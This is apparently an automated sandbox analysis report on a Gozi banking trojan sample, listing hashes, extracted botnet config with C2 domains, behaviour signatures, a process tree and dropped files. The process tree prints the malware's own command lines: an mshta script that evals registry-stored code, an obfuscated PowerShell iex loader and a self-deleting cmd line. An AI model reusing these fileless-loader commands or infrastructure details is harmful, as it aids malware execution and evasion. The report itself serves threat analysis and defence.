gozi | 122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f

Analysis

max time kernel
150s
max time network
141s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
06-10-2023 12:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JC_122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f.exe
Size

292KB
MD5

9872c3c580e8bd1a22cd4698e73e3f9a
SHA1

396576ffc8211cca1e4509e29f29e74883c626d2
SHA256

122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f
SHA512

34d7cd28bd24988c41b05911fa210f52a3f53a9106ea06e9edbc5f27e8cfeae50fb22cc3c5fa796e9514752e3b0f4c7733cb8942ce9686774b2b7b7dac1bea9d
SSDEEP

3072:zXTH4bYS/eQDmXepeDNbuSTTNG9AMY8q4LCvr4Uot:roYQeQEepeZTNG+MTasUo

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

536 cmd.exe

pid	process
536	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2616 set thread context of 1256	2616	powershell.exe	Explorer.EXE
PID 1256 set thread context of 536	1256	Explorer.EXE	cmd.exe
PID 536 set thread context of 1164	536	cmd.exe	PING.EXE
PID 1256 set thread context of 2144	1256	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1164 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1164 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1164	PING.EXE

pid	process
1164	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

JC_122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f.exepowershell.exeExplorer.EXE

pid	process
320	JC_122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f.exe
2616	powershell.exe
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE
1256	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1256 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2616 powershell.exe
1256 Explorer.EXE
536 cmd.exe
1256 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2616 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1256 Explorer.EXE

pid	process
1256	Explorer.EXE

pid	process
2616	powershell.exe
1256	Explorer.EXE
536	cmd.exe
1256	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2616	powershell.exe

pid	process
1256	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1340 wrote to memory of 2616	1340	mshta.exe	powershell.exe
PID 1340 wrote to memory of 2616	1340	mshta.exe	powershell.exe
PID 1340 wrote to memory of 2616	1340	mshta.exe	powershell.exe
PID 2616 wrote to memory of 1480	2616	powershell.exe	csc.exe
PID 2616 wrote to memory of 1480	2616	powershell.exe	csc.exe
PID 2616 wrote to memory of 1480	2616	powershell.exe	csc.exe
PID 1480 wrote to memory of 1740	1480	csc.exe	cvtres.exe
PID 1480 wrote to memory of 1740	1480	csc.exe	cvtres.exe
PID 1480 wrote to memory of 1740	1480	csc.exe	cvtres.exe
PID 2616 wrote to memory of 1808	2616	powershell.exe	csc.exe
PID 2616 wrote to memory of 1808	2616	powershell.exe	csc.exe
PID 2616 wrote to memory of 1808	2616	powershell.exe	csc.exe
PID 1808 wrote to memory of 2016	1808	csc.exe	cvtres.exe
PID 1808 wrote to memory of 2016	1808	csc.exe	cvtres.exe
PID 1808 wrote to memory of 2016	1808	csc.exe	cvtres.exe
PID 2616 wrote to memory of 1256	2616	powershell.exe	Explorer.EXE
PID 2616 wrote to memory of 1256	2616	powershell.exe	Explorer.EXE
PID 2616 wrote to memory of 1256	2616	powershell.exe	Explorer.EXE
PID 1256 wrote to memory of 536	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 536	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 536	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 536	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 536	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 536	1256	Explorer.EXE	cmd.exe
PID 536 wrote to memory of 1164	536	cmd.exe	PING.EXE
PID 536 wrote to memory of 1164	536	cmd.exe	PING.EXE
PID 536 wrote to memory of 1164	536	cmd.exe	PING.EXE
PID 536 wrote to memory of 1164	536	cmd.exe	PING.EXE
PID 536 wrote to memory of 1164	536	cmd.exe	PING.EXE
PID 536 wrote to memory of 1164	536	cmd.exe	PING.EXE
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe
PID 1256 wrote to memory of 2144	1256	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1256

C:\Users\Admin\AppData\Local\Temp\JC_122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f.exe
"C:\Users\Admin\AppData\Local\Temp\JC_122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:320

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ubqe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ubqe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DF95A089-B269-693D-B483-06AD28679A31\\\MusicPlay'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lfrhyindkh -value gp; new-alias -name jwfbxym -value iex; jwfbxym ([System.Text.Encoding]::ASCII.GetString((lfrhyindkh "HKCU:Software\AppDataLow\Software\Microsoft\DF95A089-B269-693D-B483-06AD28679A31").ContactSettings))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0qpjsye7.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D5F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D5E.tmp"
5⤵
PID:1740

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpn1qrtg.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E39.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3E38.tmp"
5⤵
PID:2016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\JC_122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1164

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0qpjsye7.dll

Filesize
3KB

MD5
b20c69a8de3fdb732b7377fe1af38cc4

SHA1
0f9a29b8bf070f5ad9591d77295d7ffd98463887

SHA256
2226b47e5d6d9d120ea07a9cf78170e5dad0d4bd3fed6ba995503a7d21f686f3

SHA512
405b643b8dbeace0a70f128780019cc937036e98cd3855682b459a3671a151aa3f0b7dc620f847689675b116661da55e6c14c065f620ac47a0e402b17fabee9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\0qpjsye7.pdb

Filesize
7KB

MD5
f0390f3e2de33dc43457c821c3ec1071

SHA1
d4cd61b6b9d02df8d37cd3a23e269e11063b6974

SHA256
128d3aad02c3070e02a8c1e78003c0217ff8eb34b77225e8eaedf43dcdffc40b

SHA512
53c0ada79ef9bc2be905afcf59a8c9822a5bae6fdd453b5765606a1ba22310af7cf29d70f99537e623bd12fd38f0f532f8929ae63b9b9d1a20495a112634eb2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3D5F.tmp

Filesize
1KB

MD5
b190745a6103fb4bb681f033895191bb

SHA1
0d3e5b18d301f4f17c32ef2315567af5a0e13dac

SHA256
5dd922b31d65184afa86c5450cf4f09a091a9f3314a23a9a132c34afeab71a60

SHA512
b27885ef400e7edf5b2b9686393266f4d6cf7d16b96b281366ff92dc3e6dfc28ffbeb50a8a7b4f49c6b444ca10f449f253fcc55a783406f51d1964afbdd73fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3E39.tmp

Filesize
1KB

MD5
162fe08445fa12e441be0a012ad14dfc

SHA1
4652192a069c837f63f36d9adc06bd33aed36a9b

SHA256
0adc1d260bca634f377a6326472d7ff53dd7530961aeff2e29bb183919255200

SHA512
59f69ab34879441cff935c391da91c98fdda47046aefba68b8a48db5b81590787a0562b4dc6844a2b8d70a2076ecbc002cebca12a395d4386a5a42b39594d71a

Download Submit
C:\Users\Admin\AppData\Local\Temp\qpn1qrtg.dll

Filesize
3KB

MD5
3c6791bdd5bc066e0127b9d335a78e83

SHA1
b1a4d6936a1b25e2cd3ce6759d4053989f944d53

SHA256
eee17c5177cf46c64fe293d987d2cb928dc2ad852c4eba2c2546c40ea734a9f1

SHA512
e9552b32fdcec00d95f8aeb205bda09b135d7c3c8c8fc6d8640b31bcc24c5e5bf72287d042aba95ae73e4a94a90c1d1b8ced8da482d77be3f2229b12526ecce8

Download Submit
C:\Users\Admin\AppData\Local\Temp\qpn1qrtg.pdb

Filesize
7KB

MD5
f136f12f431e6df099fc569025fc17d4

SHA1
7d19bfef6b1da4feac517bed4bbb9967bc6305f8

SHA256
664981fad4e353cc375e6307e032b58511732cfe5d303be212658c2472d4f3e8

SHA512
2c33d2e0dae71093ccb47601655724945fd65a3b3f4cc1cd51b49fcd735fa05b026c526c66ecc1dc8c1fdc60053ecff70f7f48a7e2aee29c74800f733c80f6e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0qpjsye7.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0qpjsye7.cmdline

Filesize
309B

MD5
3ff6e2e060043e4dc831963867d88ea3

SHA1
95b1834a37deb8cf010882eb3f6e66a76569cad5

SHA256
8b205fe6a8f1a87295c5d3e02e8a861d51b95cbf98850879901656de814a4260

SHA512
4cee91827d8f10106dfcb036247e9c56eca6724401117592308a24e25f85271d0e9423c24873da4d34e631aa5164eb117404dde553bbcb15d6de9431b7d4c0a8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3D5E.tmp

Filesize
652B

MD5
4d115320c1f74654aa0868203ecaa1e9

SHA1
721ccb6aa6de2ecb390ebdf52b96242604a94abb

SHA256
237ef592dc817746aa305489a8ac32359a773ecbb26f3cb880a9d73dd43291ed

SHA512
eef958c46b8a896ec627a459ba20f02637093f43030ed8208020f4ce9aa86a9f7869575870e594e8a3d3211fb4a90350fa3d676fcc6582c65205fce1629cd658

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3E38.tmp

Filesize
652B

MD5
b7193eafd8fd8ab335a8bdcff75b6df5

SHA1
edca4894e51e91c2ed4a99c3e13a7b7527ce60e7

SHA256
be1edd0e97afc7b773d5b6a1bd3db569413bf8b9336a25cf3e7f10c46f9f4a95

SHA512
3bc4d88631744560cb3003450a38c0eb041bf064e449db6ded0b04f84c5d76765ad1de57154df5b0d8f82456086bcdcbaa6adddaddbe4a6e67520dfdb6dedd92

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qpn1qrtg.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qpn1qrtg.cmdline

Filesize
309B

MD5
fe3b4e52162c35d9079fdec2653a7417

SHA1
4bf9e6f9c5eb09ee731b62aac10243b200f10436

SHA256
432e333e625e9c4ded50030275d4e9b497cf5c6bb3124758bf2d4d4b1a7b39f0

SHA512
0bace0d03ed13afa7e5ebc1e7fee11951dce45db45739af9fe582aecd17c6e7fd669afd5975a4a0349aa9eb01c7a3a961c2a420c53bffe0adaeb3d775ce6d8a2

Download Submit
memory/320-1-0x0000000002320000-0x0000000002420000-memory.dmp

Filesize
1024KB

Download
memory/320-14-0x0000000004AB0000-0x0000000004AB2000-memory.dmp

Filesize
8KB

Download
memory/320-8-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/320-7-0x0000000002320000-0x0000000002420000-memory.dmp

Filesize
1024KB

Download
memory/320-4-0x00000000022D0000-0x00000000022DD000-memory.dmp

Filesize
52KB

Download
memory/320-3-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/320-2-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/536-74-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/536-73-0x00000000003B0000-0x0000000000454000-memory.dmp

Filesize
656KB

Download
memory/536-99-0x00000000003B0000-0x0000000000454000-memory.dmp

Filesize
656KB

Download
memory/536-72-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

Filesize
4KB

Download
memory/1164-79-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

Filesize
4KB

Download
memory/1164-98-0x0000000001B10000-0x0000000001BB4000-memory.dmp

Filesize
656KB

Download
memory/1164-81-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1164-80-0x0000000001B10000-0x0000000001BB4000-memory.dmp

Filesize
656KB

Download
memory/1256-90-0x000000000A480000-0x000000000A5BC000-memory.dmp

Filesize
1.2MB

Download
memory/1256-94-0x000000000A480000-0x000000000A5BC000-memory.dmp

Filesize
1.2MB

Download
memory/1256-61-0x0000000004270000-0x0000000004314000-memory.dmp

Filesize
656KB

Download
memory/1256-62-0x0000000002960000-0x0000000002961000-memory.dmp

Filesize
4KB

Download
memory/1256-96-0x000000000A480000-0x000000000A5BC000-memory.dmp

Filesize
1.2MB

Download
memory/1256-97-0x0000000004270000-0x0000000004314000-memory.dmp

Filesize
656KB

Download
memory/1480-31-0x0000000002140000-0x00000000021C0000-memory.dmp

Filesize
512KB

Download
memory/1808-52-0x0000000000360000-0x00000000003E0000-memory.dmp

Filesize
512KB

Download
memory/2144-89-0x0000000001B70000-0x0000000001C08000-memory.dmp

Filesize
608KB

Download
memory/2144-85-0x0000000001B70000-0x0000000001C08000-memory.dmp

Filesize
608KB

Download
memory/2144-86-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2616-57-0x0000000002250000-0x0000000002258000-memory.dmp

Filesize
32KB

Download
memory/2616-19-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/2616-71-0x000000001BA30000-0x000000001BA6D000-memory.dmp

Filesize
244KB

Download
memory/2616-70-0x000007FEF2CF0000-0x000007FEF368D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-60-0x000000001BA30000-0x000000001BA6D000-memory.dmp

Filesize
244KB

Download
memory/2616-20-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2616-21-0x000007FEF2CF0000-0x000007FEF368D000-memory.dmp

Filesize
9.6MB

Download
memory/2616-40-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2616-22-0x0000000002A80000-0x0000000002B00000-memory.dmp

Filesize
512KB

Download
memory/2616-23-0x0000000002A80000-0x0000000002B00000-memory.dmp

Filesize
512KB

Download
memory/2616-24-0x0000000002A80000-0x0000000002B00000-memory.dmp

Filesize
512KB

Download
memory/2616-25-0x000007FEF2CF0000-0x000007FEF368D000-memory.dmp

Filesize
9.6MB

Download